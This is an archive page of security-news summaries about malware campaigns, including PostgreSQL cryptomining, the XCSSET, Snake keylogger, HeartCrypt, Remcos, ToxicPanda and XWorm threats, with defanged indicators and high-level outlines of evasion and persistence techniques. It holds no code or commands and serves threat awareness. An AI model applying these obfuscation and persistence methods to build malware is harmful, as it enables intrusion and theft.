obfuscation techniques Archives

Tech Optimizer

April 2, 2025

Over 1,500 PostgreSQL Servers Hit by Fileless Malware Attack

A malware campaign has compromised over 1,500 PostgreSQL servers using fileless techniques to deploy cryptomining payloads. The attack, linked to the threat actor group JINX-0126, exploits publicly exposed PostgreSQL instances with weak or default credentials. The attackers utilize advanced evasion tactics, including unique hashes for binaries and fileless execution of the miner payload, making detection difficult. They exploit PostgreSQL’s COPY ... FROM PROGRAM function to execute malicious payloads and perform system discovery commands. The malware includes a binary named “postmaster,” which mimics legitimate processes, and a secondary binary named “cpu_hu” for cryptomining operations. Nearly 90% of cloud environments host PostgreSQL databases, with about one-third being publicly exposed, providing easy entry points for attackers. Each wallet associated with the campaign had around 550 active mining workers, indicating the extensive scale of the attack. Organizations are advised to implement strong security configurations to protect their PostgreSQL instances.

AppWizard

March 18, 2025

331 Malicious Apps with 60 Million Downloads on Google Play Bypass Android 13 Security

Security researchers at Bitdefender have identified a major ad fraud operation involving 331 malicious applications on the Google Play Store, which have over 60 million downloads. These apps exploit vulnerabilities in Android 13 to bypass security measures and conduct phishing attacks, ad fraud, and credential theft. The malicious apps disguise themselves as utility tools, such as QR scanners and health apps, and display intrusive full-screen ads even when not in use. They also attempt to collect sensitive user data without requiring typical permissions, indicating advanced manipulation of Android APIs. The attackers employ various techniques to evade detection, including hiding app icons, launching activities without user interaction, and using persistence mechanisms to remain active on devices. Most of these apps were first active on Google Play in the third quarter of 2024, initially appearing benign before being updated with malicious features. The latest malware was uploaded to the Play Store as recently as March 4, 2025, with 15 apps still available for download at the time of the investigation. The attackers likely operate as a single entity or a collective using similar packaging tools from black markets. They utilize advanced obfuscation techniques to avoid detection, including string obfuscation, polymorphic encryption, runtime checks for debugging, and native libraries obfuscated with specialized tools. This situation highlights significant vulnerabilities in Android's security framework and emphasizes the need for robust third-party security solutions, as attackers continue to adapt their methods.

Tech Optimizer

March 12, 2025

Enhanced XCSSET Malware Targets MacOS Users with Advanced Obfuscation

Microsoft Threat Intelligence has identified a new variant of the XCSSET malware targeting macOS, specifically aimed at software developers who share Xcode project files. This variant features enhanced obfuscation techniques, updated persistence mechanisms, and a four-stage infection chain that begins with an obfuscated shell payload activated during the building of an infected Xcode project. The malware communicates with a command-and-control (C2) server to download additional payloads and employs encoding methods to hinder detection. It checks the version of XProtect to evade detection and modifies shell configuration files for persistence. The final stage involves an AppleScript payload that collects system information and redirects logs to the C2 server. The malware includes sub-modules for various malicious activities, such as stealing system information and extracting digital wallet data. Although observed in a limited number of attacks, its advanced capabilities pose a significant threat to macOS users. Users are advised to exercise caution with Xcode projects, keep systems updated, and use robust antivirus software.

Winsage

February 19, 2025

A new and dangerous keylogger is on the loose – here’s how to stay safe

Cybersecurity experts at Fortinet have identified a new threat called the Snake Keylogger, which has been involved in over 280 million blocked infection attempts. This malware uses advanced obfuscation techniques, making it difficult to detect and neutralize, and poses risks to individuals and organizations by allowing attackers access to sensitive data. Cybersecurity professionals recommend proactive defense strategies, including keeping antivirus software updated and educating users about cybersecurity issues. Fortinet has not revealed the creators of the Snake Keylogger or specific industries it targets.

Winsage

February 19, 2025

This high-risk keylogger malware is a growing threat to Windows users

Recent reports indicate a surge in the activity of the Snake keylogger, also known as the 404 Keylogger, linked to over 280 million attack attempts since the start of the year. At its peak, it was responsible for as many as 14 million infection attempts in a single day. The malware can log keystrokes and extract personally identifiable information, including geolocation data, transmitting this data back to its command server through channels like SMTP, Telegram bots, and HTTP post requests. The Snake keylogger operates on the AutoIT framework, creating a copy of itself in the Windows Startup folder to ensure execution upon every system restart. It employs advanced obfuscation techniques to evade detection by antivirus software, hiding its malicious code within processes recognized as legitimate by the operating system. The keylogger primarily spreads through sophisticated phishing attacks.

Winsage

December 17, 2024

Hackers Exploit Microsoft Management Console to Drop Backdoor Payloads on Windows

The Securonix Threat Research team has identified a phishing campaign called the “FLUX#CONSOLE campaign,” which targets tax-related themes using Microsoft Common Console Document (MSC) files to deliver a backdoor payload. The attack begins with a phishing email containing a decoy PDF titled “Income-Tax-Deduction-and-Rebates202441712.pdf,” which conceals an MSC file that executes malicious payloads. The campaign employs various tactics, including tax-themed lures, exploitation of MSC files, DLL sideloading using DISM.exe, persistence through scheduled tasks, and advanced obfuscation techniques. The attack chain involves tricking users into opening a malicious MSC file disguised as a PDF, which contains XML commands to download or extract a malicious DLL named DismCore.dll. The DLL is sideloaded using Dism.exe, and the malware communicates with a Command-and-Control server at “hxxps://siasat[.]top,” exfiltrating data via encrypted HTTPS traffic. The attackers maintained access for about 24 hours, targeting victims in Pakistan. The tactics used do not align with known advanced persistent threat groups, highlighting the growing threat of MSC files as a delivery method for malware. Indicators of Compromise (IOCs) include the C2 address siasat[.]top and analyzed file hashes for the malicious files involved in the campaign.

Tech Optimizer

December 14, 2024

New HeartCrypt Packer-as-a-Service (PaaS) Protecting Malware From Antivirus

HeartCrypt is a packer-as-a-service (PaaS) developed in July 2023 and launched in February 2024, designed to help malware operators evade antivirus detection. It has facilitated the packing of over 2,000 malicious payloads across 45 malware families. HeartCrypt injects harmful code into legitimate executable files, complicating detection by antivirus software. It is promoted on underground forums and Telegram channels, charging a fee per file for packing Windows x86 and .NET payloads. Its clients include operators of malware families like LummaStealer, Remcos, and Rhadamanthys. The packing process involves several techniques: - Payload Execution: The payload is encrypted with a single-byte XOR operation and executed through process hollowing or .NET framework capabilities. - Stub Creation: Position-independent code (PIC) is integrated into the binary’s .text section. - Control Flow Hijacking: The entry point of the original binary is altered to redirect execution to the malicious PIC. - Resource Addition: Resources disguised as BMP files contain encoded malicious code. - Obfuscation Techniques: Multiple layers of encoding are used, including stack strings and dynamic API resolution. HeartCrypt employs anti-analysis techniques such as loading non-existent DLLs to detect sandbox environments and using virtual DLLs to evade Windows Defender’s emulator. The service lowers entry barriers for malware operators, potentially increasing malware infections. Security researchers have analyzed HeartCrypt payloads, revealing insights into its operations and associated malware campaigns.

Winsage

November 12, 2024

Revamped Remcos RAT Deployed Against Microsoft Users

Threat actors have enhanced the Remcos remote access tool, making it a more sophisticated malware variant by using multiple layers of scripting languages to evade detection. This new campaign exploits a known remote code execution vulnerability in unpatched Microsoft Office and WordPad applications, initiated through a phishing email containing a disguised Excel file. The malware employs various encoding methods and obfuscation techniques to avoid analysis, including the use of PowerShell scripts and API hooking. It gathers information from the victim's device and transmits it to a command and control server. Experts emphasize the importance of patching, employee training, and robust endpoint protection to defend against such attacks.

AppWizard

November 6, 2024

ToxicPanda Malware Targets Banking Apps on Android Devices

A new Android malware named "ToxicPanda" was first identified in late October 2024 and has been reclassified as a unique entity after initial classification under the TgToxic family. It poses a risk through account takeover via on-device fraud and primarily targets retail banking applications on Android devices. The malware has spread significantly in Italy, Portugal, Spain, and various Latin American regions, with over 1,500 devices reported as victims. ToxicPanda allows cybercriminals to gain remote access to infected devices, intercept one-time passwords, and bypass two-factor authentication. The threat actors are likely Chinese speakers, which is unusual for targeting European banking. The malware spreads through social engineering tactics, encouraging users to side-load the malicious app, and exploits Android’s accessibility services for elevated permissions. Cleafy’s analysis indicates that ToxicPanda's command-and-control infrastructure shows evolving operational strategies, and the malware may undergo further modifications. The challenges for security professionals are increasing as malware operators refine their tactics and expand their targets. Cleafy noted that contemporary antivirus solutions have struggled to detect ToxicPanda due to a lack of proactive, real-time detection systems.

Winsage

October 1, 2024

New Variant Of XWorm Delivered Via Windows Script File

XWorm is a sophisticated strain of malware known for its advanced obfuscation techniques and stealthy nature. A new variant, identified by researchers from NetSkope, is being delivered through Windows script files and has progressed to version 5.6 since its first identification in 2022. The malware initiates infection via a Windows Script File (WSF), which downloads an obfuscated PowerShell script from paste[.]ee, generating files such as “VsLabs.vbs,” “VsEnhance.bat,” and “VsLabsData.ps1” in the C:ProgramDataMusicVisuals directory. It creates a scheduled task named “MicroSoftVisualsUpdater” for persistence. XWorm employs evasive techniques like reflective code loading and process injection into legitimate processes. It communicates with its command and control (C2) server through TCP sockets, using AES-ECB encryption and a modified MD5 hash. Version 5.6 introduces features like the ability to remove plugins and a “Pong” command for response time reporting. The malware conducts extensive reconnaissance on infected systems, alerts attackers via Telegram, and can access sensitive information, establish remote access, and deploy additional malware. It modifies host files to redirect DNS requests and can launch Distributed Denial of Service (DDoS) attacks. XWorm captures screenshots, executes system commands, and downloads additional payloads while maintaining stealth through process monitoring. It utilizes a structured message format for communication with the C2 server, incorporating system information.